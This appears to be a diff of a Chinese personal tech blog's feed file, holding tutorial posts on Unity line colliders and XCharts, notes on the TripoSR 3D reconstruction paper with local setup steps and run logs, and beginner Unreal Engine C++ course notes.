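    ​注意:CalculateColliderPoints 用斜率 m 推偏移量,线段完全竖直(两点 x 相同)时 m 为无穷大,偏移会算成 NaN。一个常见的替代思路(示意代码,非视频原文)是用线段方向的单位垂线直接求偏移,天然避开除零:

    private List<Vector2> CalculateColliderPoints(List<Vector2> positions) {
    float width = lineController.GetWidth();

    //线段方向的单位向量,旋转 90° 得到垂线 (-dir.y, dir.x)
    Vector2 dir = (positions[1] - positions[0]).normalized;
    Vector2 offset = new Vector2(-dir.y, dir.x) * (width / 2f);

    return new List<Vector2> {
    positions[0] + offset,
    positions[1] + offset,
    positions[1] - offset,
    positions[0] - offset
    };
    }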
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private List<DotController> dots;

    private void Awake() {
    lr = GetComponent<LineRenderer>();
    lr.positionCount = 0;

    dots = new List<DotController>();
    }

    public DotController GetFirstPoint() {
    return dots[0];
    }

    public void AddDot(DotController dot) {

    dot.SetLine(this);
    dot.SetIndex(dots.Count);

    lr.positionCount++;
    dots.Add(dot);
    }

    public void SplitPointsAtIndex(int index, out List<DotController> beforePoints, out List<DotController> afterPoints) {
    List<DotController> before = new List<DotController>();
    List<DotController> after = new List<DotController>();

    int i = 0;
    for (; i < index; i++) {
    before.Add(dots[i]);
    }
    i++;
    for (; i < dots.Count; i++) {
    after.Add(dots[i]);
    }

    beforePoints = before;
    afterPoints = after;

    dots.RemoveAt(index);
    }

    public void SetColor(Color color) {
    lr.startColor = color;
    lr.endColor = color;
    }

    public void ToggleLoop() {
    lr.loop = !lr.loop;
    }

    public bool isLooped() {
    return lr.loop;
    }

    private void LateUpdate() {
    if (dots.Count >= 2) {
    for (int i = 0; i < dots.Count; i++) {
    Vector3 position = dots[i].transform.position;
    position += new Vector3(0, 0, 5);

    lr.SetPosition(i, position);
    }
    }
    }

    public Vector3[] GetPositions() {
    Vector3[] positions = new Vector3[lr.positionCount];
    lr.GetPositions(positions);
    return positions;
    }

    public float GetWidth() {
    return lr.startWidth;
    }
    }

    ​如此,生成线条时就会附带对应的碰撞体。
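    ​要真正“检测”到这些碰撞,还需要另一个带 Collider2D(以及 Rigidbody2D)的物体来接收回调,例如挂上这样一个脚本(示意,类名自拟):

    using UnityEngine;

    public class LineHitLogger : MonoBehaviour {
    private void OnCollisionEnter2D(Collision2D collision) {
    Debug.Log("Hit line: " + collision.gameObject.name);
    }
    }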

    ]]>
    @@ -2710,7 +2710,7 @@ /posts/Unity-XCharts/ - 资源

    快速开始

    配置

    ​从 XCharts-Team/XCharts: A charting and data visualization library for Unity. Unity 数据可视化图表插件。(github.com) 把工程加载到 Assets/ 下的一个地方。

    ​之后就可以在 Hierarchy 右键创建一个 XCharts,我们创建一个 LineChart

    png

    ​可以在这个 LineChart 组件的基础上再绑上其它控制脚本。绑定 Examples/Example01_RandomData.cs

    自定义

    ​自定义脚本创建 LineChart

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using XCharts.Runtime;

    public class ChartController : MonoBehaviour
    {
    // Start is called before the first frame update
    void Start()
    {
    // 创建 LineChart 对象
    var chart = gameObject.GetComponent<LineChart>();
    if (chart == null)
    {
    chart = gameObject.AddComponent<LineChart>();
    chart.Init();
    }
    chart.SetSize(580, 300); // 代码动态设置尺寸,或直接操作 chart.rectTransform,或直接在 Inspector 上改
    // 设置标题
    var title = chart.EnsureChartComponent<Title>();
    title.text = "Simple Line";
    // 设置提示框和图例是否显示
    var tooltip = chart.EnsureChartComponent<Tooltip>();
    tooltip.show = true;

    var legend = chart.EnsureChartComponent<Legend>();
    legend.show = false;
    // 设置坐标轴
    var xAxis = chart.EnsureChartComponent<XAxis>();
    xAxis.splitNumber = 10;
    xAxis.boundaryGap = true;
    xAxis.type = Axis.AxisType.Category;

    var yAxis = chart.EnsureChartComponent<YAxis>();
    yAxis.type = Axis.AxisType.Value;
    // 清空默认数据,添加 Line 类型的 Serie 用于接收数据
    chart.RemoveData();
    chart.AddSerie<Line>("line");
    // 添加 10 个数据
    for (int i = 0; i < 10; i++)
    {
    chart.AddXAxisData(i + "");
    chart.AddData(0, Random.Range(10, 20));
    }
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    ​写一个按下按钮追加数据的逻辑:

    // 注意:chart 需提升为类的成员字段(如 private LineChart chart;),Start() 里的局部变量在这里不可见
    public void onClick()
    {
    chart.AddXAxisData(chart.series[0].GetDataList().Count + "");
    chart.AddData(0, Random.Range(10, 20));
    }

    ​你还可以用代码控制更多参数,Examples 下还有更多例子;凡是 Inspector 上看到的可配置参数,都可以通过代码设置,具体见 XCharts 配置项手册。

    ​另外,除非定制,建议调用 Chart 下提供的 public 接口,特别是数据相关操作部分。这些接口内部会做一些关联处理,比如刷新图表等。常见的接口有:

    1. chart.ClearData():清空图表数据(不移除 Series)
    2. chart.RemoveData():清除图表数据(会移除所有 Series)
    3. chart.AddSerie():添加 Serie
    4. chart.AddXAxisData():添加 X 轴数据
    5. chart.AddData():添加 Serie 数据
    6. chart.UpdateData():更新 Serie 数据
    7. chart.UpdateXAxisData():更新 X 轴数据
    8. chart.UpdateDataName():更新 Serie 数据的名字
    ]]>
    + 资源

    快速开始

    配置

    ​从 XCharts-Team/XCharts: A charting and data visualization library for Unity. Unity 数据可视化图表插件。(github.com) 把工程加载到 Assets/ 下的一个地方。

    ​之后就可以在 Hierarchy 右键创建一个 XCharts,我们创建一个 LineChart

    png

    ​可以在这个 LineChart 组件的基础上再绑上其它控制脚本。绑定 Examples/Example01_RandomData.cs

    自定义

    ​自定义脚本创建 LineChart

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using XCharts.Runtime;

    public class ChartController : MonoBehaviour
    {
    // Start is called before the first frame update
    void Start()
    {
    // 创建 LineChart 对象
    var chart = gameObject.GetComponent<LineChart>();
    if (chart == null)
    {
    chart = gameObject.AddComponent<LineChart>();
    chart.Init();
    }
    chart.SetSize(580, 300); // 代码动态设置尺寸,或直接操作 chart.rectTransform,或直接在 Inspector 上改
    // 设置标题
    var title = chart.EnsureChartComponent<Title>();
    title.text = "Simple Line";
    // 设置提示框和图例是否显示
    var tooltip = chart.EnsureChartComponent<Tooltip>();
    tooltip.show = true;

    var legend = chart.EnsureChartComponent<Legend>();
    legend.show = false;
    // 设置坐标轴
    var xAxis = chart.EnsureChartComponent<XAxis>();
    xAxis.splitNumber = 10;
    xAxis.boundaryGap = true;
    xAxis.type = Axis.AxisType.Category;

    var yAxis = chart.EnsureChartComponent<YAxis>();
    yAxis.type = Axis.AxisType.Value;
    // 清空默认数据,添加 Line 类型的 Serie 用于接收数据
    chart.RemoveData();
    chart.AddSerie<Line>("line");
    // 添加 10 个数据
    for (int i = 0; i < 10; i++)
    {
    chart.AddXAxisData(i + "");
    chart.AddData(0, Random.Range(10, 20));
    }
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    ​写一个按下按钮追加数据的逻辑:

    // 注意:chart 需提升为类的成员字段(如 private LineChart chart;),Start() 里的局部变量在这里不可见
    public void onClick()
    {
    chart.AddXAxisData(chart.series[0].GetDataList().Count + "");
    chart.AddData(0, Random.Range(10, 20));
    }

    ​你还可以用代码控制更多参数,Examples 下还有更多例子;凡是 Inspector 上看到的可配置参数,都可以通过代码设置,具体见 XCharts 配置项手册。

    ​另外,除非定制,建议调用 Chart 下提供的 public 接口,特别是数据相关操作部分。这些接口内部会做一些关联处理,比如刷新图表等。常见的接口有:

    1. chart.ClearData():清空图表数据(不移除 Series)
    2. chart.RemoveData():清除图表数据(会移除所有 Series)
    3. chart.AddSerie():添加 Serie
    4. chart.AddXAxisData():添加 X 轴数据
    5. chart.AddData():添加 Serie 数据
    6. chart.UpdateData():更新 Serie 数据
    7. chart.UpdateXAxisData():更新 X 轴数据
    8. chart.UpdateDataName():更新 Serie 数据的名字
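
    例如,想更新第 0 个 Serie 的第 i 个数据,可以这样调用(示意写法,chart 为前文获取的 LineChart 实例,i 为已有数据的下标):

    chart.UpdateData(0, i, Random.Range(10, 20)); // 更新 serie 0 的第 i 个数据,内部会自动刷新图表
    chart.UpdateXAxisData(i, "new-" + i); // 同步更新对应的 X 轴类目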
    ]]>
    @@ -2735,7 +2735,7 @@ /posts/Paper-TripoSR-Fast%203D%20Object%20Reconstruction%20from%20a%20Single%20Image/ - 资源

    全文

    Abstract

    ​TripoSR 是一个使用 transformer 进行快速 Feed-forward 3D 生成的 3D 重建模型。在 LRM 网络架构(ICLR 2024 Oral | Adobe 提出 LRM:单个图像到 3D 的大型重建模型 - 知乎 (zhihu.com))的基础上,TripoSR 集成了数据处理、模型设计和训练技术方面的实质性改进。

    1. Introduction

    ​近期三维重建获得数据的办法:利用 2D 扩散模型从文本提示或输入图像创建 3D 资产。(利用 2D 先验进行 3D 生成)但是效率低。

    ​Feed-forward 3D 重建模型实现了显著更高的计算效率。沿着这个方向,最近的几种方法在不同的 3D 数据集上的可扩展训练中显示出了前景。

    2. TripoSR: Data and Model Improvements

    ​TripoSR 的设计基于 LRM,在数据管理、模型和训练策略方面取得了一系列技术进步。现在,我们对模型进行概述,然后进行技术改进。

    2.1. Model Overview

    ​TripoSR 的核心包括以下组件:

    • 图像编码器(image encoder)
      • 使用预先训练的视觉变换器模型 DINOv1 进行初始化,该模型将 RGB 图像投影到一组潜在向量中。这些矢量对图像的全局和局部特征进行编码,并包括重建 3D 对象所需的信息。
    • 图像到三平面解码器(image-to-triplane decoder)
      • 将潜在矢量变换到三平面 NeRF 表示上。
    • 基于三平面的神经辐射场(triplane-based NeRF)。
      • NeRF 模型由一堆多层感知器(MLP)组成,这些感知器负责预测空间中 3D 点的颜色和密度。

    2.2. Data Improvements

    • 数据整理:通过选择一个精心策划的 Objaverse 数据集子集,该子集在 CC-By 许可证下可用,我们提高了训练数据的质量。
    • 数据渲染:我们采用了一系列不同的数据渲染技术,这些技术更接近于模拟真实世界图像的分布,从而增强了模型的泛化能力,即使是在专门使用 Objaverse 数据集进行训练的情况下也是如此。

    2.3. Model and Training Improvements

    • 三平面通道优化

    • Mask Loss

      • 在训练过程中引入了 Mask Loss,显著减少了“漂浮物”伪影,并提高了重建的保真度
    • Local Rendering Supervision.

    3. Results

    评估数据集。我们策划了两个公共数据集,GSO 和 OmniObject3D,用于评估。我们发现,这两个数据集都包括许多简单形状的对象(例如,长方体、球体或圆柱体),因此可能导致对这些简单形状的高度验证偏差。因此,我们手动过滤数据集,并从每个数据集中选择大约 300 个对象,以确保它们形成一个多样且具有代表性的公共对象集合。

    三维形状度量。我们使用 Marching Cubes 提取等值面,将隐式 3D 表示(如 NeRF)转换为网格。我们从这些曲面中采样 10K 个点,以计算倒角距离(CD)和 Fscore(FS)。考虑到一些方法无法预测以视图为中心的形状,我们使用蛮力搜索方法将预测与地面实况形状对齐。

    定量比较。我们将 TripoSR 与使用前馈技术的现有最先进的 3D 重建基线进行了比较,包括 One-2-345、三平面高斯(TGS)、ZeroShape 和 OpenLRM。

    性能与运行时。TripoSR 的另一个关键优势是它的推理速度。在 NVIDIA A100 GPU 上从单个图像生成 3D 网格大约需要 0.5 秒。

    4. Conclusion

    ​我们希望 TripoSR 能够帮助研究人员和开发人员开发更先进的 3D 生成人工智能模型。

    开跑

    ​可以到 TripoSR - a Hugging Face Space by stabilityai 在线玩,也可以尝试离线部署。

    ​从 VAST-AI-研究/TripoSR (github.com) 获取代码仓库。

    ​整一个虚拟环境:

    conda create -n TripoSR python=3.9

    ​装好 pytorch 后,在代码仓库里装好库:

    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    ​看一下 run.py 里的 argparse:

    image:接受一个或多个字符串作为输入,表示输入图像的路径。
    --device:指定要使用的设备,如果没有找到兼容 CUDA 的设备,则会回退到使用 CPU。默认为 'cuda:0'。
    --pretrained-model-name-or-path:指定预训练模型的路径或名称,可以是 huggingface 模型 id 或本地路径。默认为 'stabilityai/TripoSR'。
    --chunk-size:表示用于表面提取和渲染的评估块大小。较小的块大小会减少 VRAM 使用量,但会增加计算时间。设置为 0 表示不分块。默认为 8192。
    --mc-resolution:Marching cubes 网格的分辨率。默认为 256。
    --no-remove-bg:如果指定此选项,则不会自动从输入图像中移除背景,输入图像应为带有灰色背景和正确尺寸前景的 RGB 图像。默认为 false。
    --foreground-ratio:前景大小与图像大小的比例。仅在未指定 --no-remove-bg 时使用。默认为 0.85。
    --output-dir:保存结果的输出目录。默认为 'output/'。
    --model-save-format:保存提取的网格的格式,可选项为 'obj' 或 'glb'。默认为 'obj'。
    --render:如果指定此选项,则保存一个 NeRF 渲染的视频。默认为 false。

    ​由于墙内下载 huggingface 的模型容易失败,改为采用离线加载模型的形式。修改 run.py 里的内容:

    parser.add_argument(
    "--pretrained-model-name-or-path",
    default= "models/", # "stabilityai/TripoSR",
    type=str,
    help="Path to the pretrained model. Could be either a huggingface model id is or a local path. Default: 'stabilityai/TripoSR'",
    )

    ​从 stabilityai/TripoSR at main (huggingface.co) 下载 config.yaml 和 model.ckpt 到 models/ 下:

    放置模型

    ​准备一张模型图片,就决定是你了!淘宝吉祥物!

    阿里吉祥物

    ​开跑!

    python run.py examples/XXX.png --output-dir output/

    ​emmm 还是下了一个叫 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' 的东西,还好没被墙。

    2024-03-18 11:02:00,713 - INFO - Initializing model ...
    Downloading config.json: 100%|█████████████████████████████████████████████████████████| 454/454 [00:00<00:00, 149kB/s]
    C:\Users\19048\.conda\envs\TripoSR\lib\site-packages\huggingface_hub\file_download.py:137: UserWarning: `huggingface_hub` cache-system uses symlinks by default to efficiently store duplicated files but your machine does not support them in C:\Users\19048\.cache\huggingface\hub. Caching files will still work but in a degraded version that might require more space on your disk. This warning can be disabled by setting the `HF_HUB_DISABLE_SYMLINKS_WARNING` environment variable. For more details, see https://huggingface.co/docs/huggingface_hub/how-to-cache#limitations.
    To support symlinks on Windows, you either need to activate Developer Mode or to run Python as an administrator. In order to see activate developer mode, see this article: https://docs.microsoft.com/en-us/windows/apps/get-started/enable-your-device-for-development
    warnings.warn(message)
    2024-03-18 11:02:07,536 - INFO - Initializing model finished in 6819.83ms.
    2024-03-18 11:02:07,539 - INFO - Processing images ...
    Downloading data from 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' to file 'C:\Users\19048\.u2net\u2net.onnx'.
    100%|########################################| 176M/176M [00:00<00:00, 117GB/s]
    2024-03-18 11:02:30,617 - INFO - Processing images finished in 23078.31ms.
    2024-03-18 11:02:30,617 - INFO - Running image 1/1 ...
    2024-03-18 11:02:30,618 - INFO - Running model ...
    2024-03-18 11:02:35,306 - INFO - Running model finished in 4686.22ms.
    2024-03-18 11:02:35,306 - INFO - Exporting mesh ...
    torchmcubes was not compiled with CUDA support, use CPU version instead.
    2024-03-18 11:02:37,869 - INFO - Exporting mesh finished in 2563.17ms.

    ​这个程序会自动帮你抠图:

    自动抠图

    ​不过抠得不是很好,导致生成的模型多了点背景信息。我们手动抠图再试一次:

    手动抠图

    ​用 Blender 打开这个模型,修复一下旋转。生成的模型显示不出纹理信息,按 stabilityai/TripoSR · It doesn’t save texture to the .obj? (huggingface.co) 所说,应该在 Blender 里设置一下材质(将 Color Attribute 节点连接到 Base Color 里,但好像有些模型还是不行……):

    设置材质

    ​顺便送这个模型一个 Decimate 减少一下面数再导出,真是太棒了!

    ]]>
    + 资源

    全文

    Abstract

    ​TripoSR 是一个使用 transformer 进行快速 Feed-forward 3D 生成的 3D 重建模型。在 LRM 网络架构(ICLR 2024 Oral | Adobe 提出 LRM:单个图像到 3D 的大型重建模型 - 知乎 (zhihu.com))的基础上,TripoSR 集成了数据处理、模型设计和训练技术方面的实质性改进。

    1. Introduction

    ​近期三维重建获得数据的办法:利用 2D 扩散模型从文本提示或输入图像创建 3D 资产。(利用 2D 先验进行 3D 生成)但是效率低。

    ​Feed-forward 3D 重建模型实现了显著更高的计算效率。沿着这个方向,最近的几种方法在不同的 3D 数据集上的可扩展训练中显示出了前景。

    2. TripoSR: Data and Model Improvements

    ​TripoSR 的设计基于 LRM,在数据管理、模型和训练策略方面取得了一系列技术进步。现在,我们对模型进行概述,然后进行技术改进。

    2.1. Model Overview

    ​TripoSR 的核心包括以下组件:

    • 图像编码器(image encoder)
      • 使用预先训练的视觉变换器模型 DINOv1 进行初始化,该模型将 RGB 图像投影到一组潜在向量中。这些矢量对图像的全局和局部特征进行编码,并包括重建 3D 对象所需的信息。
    • 图像到三平面解码器(image-to-triplane decoder)
      • 将潜在矢量变换到三平面 NeRF 表示上。
    • 基于三平面的神经辐射场(triplane-based NeRF)。
      • NeRF 模型由一堆多层感知器(MLP)组成,这些感知器负责预测空间中 3D 点的颜色和密度。

    2.2. Data Improvements

    • 数据整理:通过选择一个精心策划的 Objaverse 数据集子集,该子集在 CC-By 许可证下可用,我们提高了训练数据的质量。
    • 数据渲染:我们采用了一系列不同的数据渲染技术,这些技术更接近于模拟真实世界图像的分布,从而增强了模型的泛化能力,即使是在专门使用 Objaverse 数据集进行训练的情况下也是如此。

    2.3. Model and Training Improvements

    • 三平面通道优化

    • Mask Loss

      • 在训练过程中引入了 Mask Loss,显著减少了“漂浮物”伪影,并提高了重建的保真度
    • Local Rendering Supervision.

    3. Results

    评估数据集。我们策划了两个公共数据集,GSO 和 OmniObject3D,用于评估。我们发现,这两个数据集都包括许多简单形状的对象(例如,长方体、球体或圆柱体),因此可能导致对这些简单形状的高度验证偏差。因此,我们手动过滤数据集,并从每个数据集中选择大约 300 个对象,以确保它们形成一个多样且具有代表性的公共对象集合。

    三维形状度量。我们使用 Marching Cubes 提取等值面,将隐式 3D 表示(如 NeRF)转换为网格。我们从这些曲面中采样 10K 个点,以计算倒角距离(CD)和 Fscore(FS)。考虑到一些方法无法预测以视图为中心的形状,我们使用蛮力搜索方法将预测与地面实况形状对齐。

    定量比较。我们将 TripoSR 与使用前馈技术的现有最先进的 3D 重建基线进行了比较,包括 One-2-345、三平面高斯(TGS)、ZeroShape 和 OpenLRM。

    性能与运行时。TripoSR 的另一个关键优势是它的推理速度。在 NVIDIA A100 GPU 上从单个图像生成 3D 网格大约需要 0.5 秒。

    4. Conclusion

    ​我们希望 TripoSR 能够帮助研究人员和开发人员开发更先进的 3D 生成人工智能模型。

    开跑

    ​可以到 TripoSR - a Hugging Face Space by stabilityai 在线玩,也可以尝试离线部署。

    ​从 VAST-AI-研究/TripoSR (github.com) 获取代码仓库。

    ​整一个虚拟环境:

    conda create -n TripoSR python=3.9

    ​装好 pytorch 后,在代码仓库里装好库:

    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    ​看一下 run.py 里的 argparse:

    image:接受一个或多个字符串作为输入,表示输入图像的路径。
    --device:指定要使用的设备,如果没有找到兼容 CUDA 的设备,则会回退到使用 CPU。默认为 'cuda:0'。
    --pretrained-model-name-or-path:指定预训练模型的路径或名称,可以是 huggingface 模型 id 或本地路径。默认为 'stabilityai/TripoSR'。
    --chunk-size:表示用于表面提取和渲染的评估块大小。较小的块大小会减少 VRAM 使用量,但会增加计算时间。设置为 0 表示不分块。默认为 8192。
    --mc-resolution:Marching cubes 网格的分辨率。默认为 256。
    --no-remove-bg:如果指定此选项,则不会自动从输入图像中移除背景,输入图像应为带有灰色背景和正确尺寸前景的 RGB 图像。默认为 false。
    --foreground-ratio:前景大小与图像大小的比例。仅在未指定 --no-remove-bg 时使用。默认为 0.85。
    --output-dir:保存结果的输出目录。默认为 'output/'。
    --model-save-format:保存提取的网格的格式,可选项为 'obj' 或 'glb'。默认为 'obj'。
    --render:如果指定此选项,则保存一个 NeRF 渲染的视频。默认为 false。

    ​由于墙内下载 huggingface 的模型容易失败,改为采用离线加载模型的形式。修改 run.py 里的内容:

    parser.add_argument(
    "--pretrained-model-name-or-path",
    default= "models/", # "stabilityai/TripoSR",
    type=str,
    help="Path to the pretrained model. Could be either a huggingface model id is or a local path. Default: 'stabilityai/TripoSR'",
    )

    ​从 stabilityai/TripoSR at main (huggingface.co) 下载 config.yaml 和 model.ckpt 到 models/ 下:

    放置模型

    ​准备一张模型图片,就决定是你了!淘宝吉祥物!

    阿里吉祥物

    ​开跑!

    python run.py examples/XXX.png --output-dir output/
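
    ​如果想一次性指定更多参数,可以对照上面的 argparse 表(示意,数值为随手举例):

    python run.py examples/XXX.png --mc-resolution 320 --model-save-format glb --render --output-dir output/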

    ​emmm 还是下了一个叫 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' 的东西,还好没被墙。

    2024-03-18 11:02:00,713 - INFO - Initializing model ...
    Downloading config.json: 100%|█████████████████████████████████████████████████████████| 454/454 [00:00<00:00, 149kB/s]
    C:\Users\19048\.conda\envs\TripoSR\lib\site-packages\huggingface_hub\file_download.py:137: UserWarning: `huggingface_hub` cache-system uses symlinks by default to efficiently store duplicated files but your machine does not support them in C:\Users\19048\.cache\huggingface\hub. Caching files will still work but in a degraded version that might require more space on your disk. This warning can be disabled by setting the `HF_HUB_DISABLE_SYMLINKS_WARNING` environment variable. For more details, see https://huggingface.co/docs/huggingface_hub/how-to-cache#limitations.
    To support symlinks on Windows, you either need to activate Developer Mode or to run Python as an administrator. In order to see activate developer mode, see this article: https://docs.microsoft.com/en-us/windows/apps/get-started/enable-your-device-for-development
    warnings.warn(message)
    2024-03-18 11:02:07,536 - INFO - Initializing model finished in 6819.83ms.
    2024-03-18 11:02:07,539 - INFO - Processing images ...
    Downloading data from 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' to file 'C:\Users\19048\.u2net\u2net.onnx'.
    100%|########################################| 176M/176M [00:00<00:00, 117GB/s]
    2024-03-18 11:02:30,617 - INFO - Processing images finished in 23078.31ms.
    2024-03-18 11:02:30,617 - INFO - Running image 1/1 ...
    2024-03-18 11:02:30,618 - INFO - Running model ...
    2024-03-18 11:02:35,306 - INFO - Running model finished in 4686.22ms.
    2024-03-18 11:02:35,306 - INFO - Exporting mesh ...
    torchmcubes was not compiled with CUDA support, use CPU version instead.
    2024-03-18 11:02:37,869 - INFO - Exporting mesh finished in 2563.17ms.

    ​这个程序会自动帮你抠图:

    自动抠图

    ​不过抠得不是很好,导致生成的模型多了点背景信息。我们手动抠图再试一次:

    手动抠图

    ​用 Blender 打开这个模型,修复一下旋转。生成的模型显示不出纹理信息,按 stabilityai/TripoSR · It doesn’t save texture to the .obj? (huggingface.co) 所说,应该在 Blender 里设置一下材质(将 Color Attribute 节点连接到 Base Color 里,但好像有些模型还是不行……):

    设置材质

    ​顺便送这个模型一个 Decimate 减少一下面数再导出,真是太棒了!

    ]]>
    @@ -2787,7 +2787,7 @@ /posts/Software-Unreal%20%E8%99%9A%E5%B9%BB%20C++%20%E9%9B%B6%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/ - 资源

    环境配置

    ​还是把版本换成 UE4.27 吧,让它支持 VS2022。

    课程

    202-Unreal 项目文件结构解读

    一些子目录是在引擎和游戏项目目录之间通用的:

    • Binaries - 包含可执行文件或编译期间创建的其他文件。

    • Build - 包含构建引擎或游戏所需的文件,包括创建特定于平台的构建版所需的文件。

    • Config - 配置文件,用于设置用来控制引擎行为的值。项目 Config 文件中设置的值会覆盖 Engine\Config 目录中设置的值。

    • Content - 保存引擎或游戏的内容,包括资源包和贴图。

    • DerivedDataCache - 包含加载时针对引用内容生成的派生数据文件。引用内容没有相应的缓存文件会导致加载时间显著延长。

    • Intermediate - 包含构建引擎或游戏时生成的临时文件。在游戏目录中,着色器存储在 Intermediate 目录中。

    • Saved - 包含自动保存、配置(.ini)文件和日志文件。此外,Engine\Saved 目录还包含崩溃日志、硬件信息和 Swarm 选项与数据。

    • Source - 包含引擎或游戏的所有源文件,包括引擎源代码、工具和游戏类等。

      • Engine - Engine 目录中的源文件组织结构如下:

        • Developer - 编辑器和引擎共同使用的文件。
        • Editor - 仅供编辑器使用的文件。
        • Programs - 引擎或编辑器使用的外部工具。
        • Runtime - 仅供引擎使用的文件。
      • Game - 游戏项目源码,建议按模块的方式进行组织。

    ​迁移项目最小的单元是 Config、Content 和 XXX.uproject。

    203-Unreal 缓存数据解读

    png

    ​Epic 中修改保管库的缓存位置。

    png

    ​这个路径存放着着色器的缓存。

    209-C++ 与蓝图的关系与选择

    C++ 与蓝图

    • 两者关系
      • 蓝图建立在 C++ 代码之上
      • 蓝图与 C++ 可以很好地协作
    • 理论平衡
      • C++ 由游戏逻辑程序员使用
        • 完成虚幻尚未封装的功能
        • 完成根据项目需求需要自定义的功能
      • 蓝图由游戏设计人员使用
        • 设计其他游戏资源
        • 功能测试时使用
        • 项目快速迭代时使用
        • 调用编写好的 C++ 代码

    什么是蓝图可视化脚本

    • 蓝图可视化脚本简称“蓝图”、“蓝图脚本”
    • 蓝图是一种可视化编程
      • 实际上,你使用蓝图的时候就是在编程
      • 蓝图是一种需要编译的面向对象的可视化编程语言
    • 蓝图完全集成在虚幻 4 中
    • 通过节点与连线工作

    什么是蓝图系统

    • 蓝图系统俗称“蓝图”、“蓝图类”
    • 将蓝图类想象成游戏内容的容器
      • 其可以包含组件
      • 其可以包含脚本
      • 其可以仅仅包含数据

    301-C++ 基础回顾与虚幻 C++ 类的继承结构

    虚幻引擎 C++ 类层级结构 (Hierarchy)

    • Object

      • 存放数据

      • 不能被放置到场景 (Level) 中

    • Actor

      • 能放置在场景 (Level) 中
      • 可以有视觉表现/可以被看到
    • Pawn

      • 可以被控制器 (Controller) 持有 (Possess)
    • Character

      • 有角色移动组件 (CharacterMovementComponent)
      • 具有适合角色的封装好的一系列功能

    一个 Object 不是 (Is NOT a) Actor

    一个 Object 不是一个 (Is NOT a) Pawn

    一个 Actor 是一个 (Is a) Object

    一个 Actor 不是一个 (Is NOT a) Pawn

    一个 Pawn 是 (Is a) Actor

    一个 Pawn 是 (Is a) Object

    png

    Package、World、Level、Actor 之间的关系。

    302-使用宏参与虚幻的反射与垃圾回收系统

    ​UE4 的反射系统允许在运行时获取类的信息、动态创建对象、调用函数等操作,而无需提前知道类的具体类型。通过反射系统,可以实现诸如蓝图编辑、插件系统、序列化和反序列化等功能。在 UE4 中,反射系统主要基于宏(macros)和元数据(metadata)来实现,开发者可以利用它来实现更灵活的代码设计和功能扩展。(在蓝图脚本中调用 C++ 的内容)

    ​UE4 的垃圾回收系统负责管理动态分配的内存,在运行时自动释放不再需要的内存空间,防止内存泄漏和提高性能。UE4 使用基于引用计数(reference counting)和标记-清除(mark and sweep)算法的混合方式来进行垃圾回收,确保及时释放不再使用的对象,并最大程度地减少性能损耗。

    png

    ​在定义类、变量、函数前分别加上 UCLASS()、UPROPERTY()、UFUNCTION() 这样的宏,就可以参与反射与垃圾回收系统。

    ​引用头文件时,#include "MyActor.generated.h" 务必放在所有引用的头文件的下方。
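
    ​落到代码上的直接影响是:只有被 UPROPERTY() 标记的 UObject 指针才会被反射系统登记,进而被垃圾回收器视为有效引用。下面是一个最小示意(UMyHolder 为自拟类名,非课程代码):

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyHolder.generated.h"

    UCLASS()
    class MYPROJECT8_API UMyHolder : public UObject
    {
    GENERATED_BODY()

    public:

    UPROPERTY() // 参与反射与垃圾回收,被本对象引用期间不会被回收
    UObject* TrackedObject;

    UObject* RawObject; // 不被 GC 追踪,指向的对象可能被回收成野指针
    };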

    303-创建自己的第一个 UObject 子类

    ​新建一个 C++ 项目。

    png

    ​项目中确保打开了 Show C++ Classes

    png

    ​所有 C++ 类都会被存放到 C++ Classes/项目名称 中。

    png

    ​在这个目录下创建一个 C++ class,打开 Show All Classes,创建一个 Object 类。

    png

    ​名字取为 MyObject,则会生成 MyObject.cppMyObject.h 两个文件。

    .cpp 文件是写逻辑用的,.h 文件是写声明用的。

    ​修改 MyObject.h 文件,然后保存:

    // Fill out your copyright notice in the Description page of Project Settings.

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()
    };

    ​通过在类声明前添加 UCLASS(Blueprintable) 宏,可以让该类在 UE4 的蓝图编辑器中可见,允许开发者使用蓝图来创建该类的实例、设置属性和调用函数(在蓝图脚本中调用 C++ 的内容)。

    png

    ​可以用 VS 的生成进行编译(有可能 UE4 没反应过来,但可以方便地显示中文的报错信息)。

    png

    ​也可以用 UE4 的 Compile 按钮编译。

    png

    ​此时所创建的类就可以 Create Blueprint class based on MyObject

    304-加快 Unreal 编译速度

    ​UE4.22 中,每次编译都会重新生成反射代码,影响编译速度(不知道 4.27 还有没有……)。

    ​课程中提到的解决方案是,安装路径下找到 Win64/UnrealHeaderTool.target,往其中的第二行加一个空格……真玄学。

    png

    305-创建 UObject 的蓝图类与基础宏参数介绍

    png

    ​对于之前所创建的 MyObject 类,选择 Create Blueprint class based on MyObject 以创建一个反射的蓝图,命名为 BP_MyObject

    ​编写 MyObject.h 的代码,给 MyObject 定义一个构造函数、float 类型变量 MyFloat 和函数 MyFunction();给变量加宏 UPROPERTY(BlueprintReadWrite) 使其能在蓝图中读写,给函数加宏 UFUNCTION(BlueprintCallable) 使其能在蓝图中调用:

    // Fill out your copyright notice in the Description page of Project Settings.

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()

    public:

    UMyObject();

    UPROPERTY(BlueprintReadWrite)
    float MyFloat;

    UFUNCTION(BlueprintCallable)
    void MyFunction();
    };

    ​在 MyObject.cpp 里写实现(暂为空):

    #include "MyObject.h"

